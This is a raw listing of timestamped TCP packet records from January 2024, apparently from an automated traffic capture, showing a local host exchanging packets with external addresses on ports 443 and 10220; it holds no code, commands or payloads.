                                                                                                                                                                      Jan 12, 2024 06:48:13.557256937 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.557315111 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557373047 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.557385921 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557430029 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557435036 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.557501078 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.559717894 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.559746981 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.705775023 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.705873013 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.133519888 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.134372950 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.322850943 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.322890997 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.322952032 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.322972059 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.323887110 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.512207985 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.512674093 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.512790918 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.580996990 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.690685034 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.810923100 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.878858089 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879245996 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879302025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879354000 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879407883 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879446983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879517078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879517078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879517078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879527092 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879574060 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879642010 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879683971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879713058 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879713058 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879743099 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879766941 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.882666111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068341017 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068355083 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068365097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068404913 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068416119 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068464041 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068504095 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068515062 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068522930 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068537951 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068573952 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068608046 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068670988 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068702936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068768978 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068797112 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068871021 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068900108 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068932056 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068973064 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068996906 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069066048 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069128036 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.069163084 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069211960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069264889 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.069283009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069348097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069401026 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.070874929 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.070946932 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.071029902 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258326054 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258404970 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258542061 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258555889 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258565903 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258589983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258606911 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258642912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258645058 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258661032 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258708000 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258708954 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258721113 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258779049 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258799076 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258853912 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258867025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258913040 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258936882 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259047031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259104967 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259183884 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.259409904 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259428978 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.259469032 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.259541988 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259597063 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259609938 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259701014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.259701967 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.259742022 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.259799004 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260037899 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260068893 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260135889 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260143995 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260205984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260206938 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260217905 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260263920 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260272026 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260318995 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260346889 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260369062 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260416985 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260427952 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260436058 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260489941 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260493994 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260531902 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260545969 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260576010 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260607004 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260633945 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260699034 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260708094 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260787964 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260852098 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.260889053 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.260977983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.261014938 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.261126995 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.261441946 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.261603117 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.261667967 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.261719942 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.261799097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.261848927 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447089911 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447105885 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447139025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447168112 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447206020 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447204113 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447264910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447273970 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447333097 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447343111 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447412968 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447474957 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447520971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447596073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447649002 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447693110 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447820902 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447880983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447882891 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.447896004 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.447959900 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448010921 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448021889 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448072910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448076010 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448126078 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448137999 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448194981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448223114 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448273897 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448316097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448338032 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448363066 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448446989 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448461056 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448523045 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448523998 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448537111 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448604107 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448657036 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448676109 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448735952 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448791981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448791981 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448846102 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448860884 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448890924 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.448936939 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.448966026 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449004889 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449059963 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449063063 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449106932 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449132919 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449162960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449210882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449217081 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449269056 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449311018 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449362993 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449376106 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449429035 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449467897 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449501038 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449522018 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449558020 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449636936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449685097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449693918 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449737072 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449749947 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449763060 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449840069 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.449911118 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.449939013 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450001955 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450005054 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450045109 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450093985 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450133085 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450186014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450246096 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450253010 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450309038 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450330973 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450373888 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450392008 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450452089 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450479984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450557947 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450587034 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450648069 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450673103 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450732946 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450767040 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450843096 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.450942039 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.450943947 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451005936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451071024 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451128960 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451144934 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451224089 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451287985 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451306105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451373100 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451375961 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451441050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451507092 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451514006 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451565981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451586962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451610088 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451669931 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451697111 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451746941 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451747894 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451813936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451867104 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451877117 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.451945066 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.451998949 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.452004910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.452038050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.452091932 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.452117920 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.452353954 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.636400938 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.636424065 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.636440992 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.636456966 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.636475086 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.636522055 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.636557102 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.636684895 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.636751890 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.636846066 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.636956930 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.637017965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.637058020 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.637087107 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.637111902 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.637167931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.637223005 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.637244940 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.637389898 CET4975110220192.168.2.4116.202.0.196
